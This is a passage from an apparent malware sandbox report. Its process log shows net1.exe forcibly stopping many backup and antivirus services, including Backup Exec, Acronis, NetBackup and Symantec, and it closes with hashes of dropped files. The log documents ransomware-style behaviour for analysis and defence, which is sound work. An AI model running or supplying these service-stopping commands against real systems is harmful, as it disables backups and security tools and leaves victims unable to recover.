C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵PID:5952
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y1⤵PID:5940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵PID:5856
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y1⤵PID:5836
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y1⤵PID:5788
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵PID:5780
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵PID:5724
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵PID:5716
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵PID:5684
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y1⤵PID:5584
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵PID:5524
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y1⤵PID:5392
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y1⤵PID:5416
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y1⤵PID:5400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y1⤵PID:5408
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y1⤵PID:5328
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y1⤵PID:5316
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y1⤵PID:5240
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:5788
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59e8015c08190ef0ccd9aca1ed336ff08
SHA111af8dde90ec2e35e882b00e5a12996e900c566a
SHA2567196c2183a0dafdb2f45d5e2a8c7c2f7092ee101bd8961c8b8db71547cf8adfc
SHA51222dc3d30380690c3de56da93e8c1a02204ef66b8a875a383a9789f08e2c6820de2a6e103e7c09c37349d5977df70cf63a37f945795f4034ce6f7760b9f248e87
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a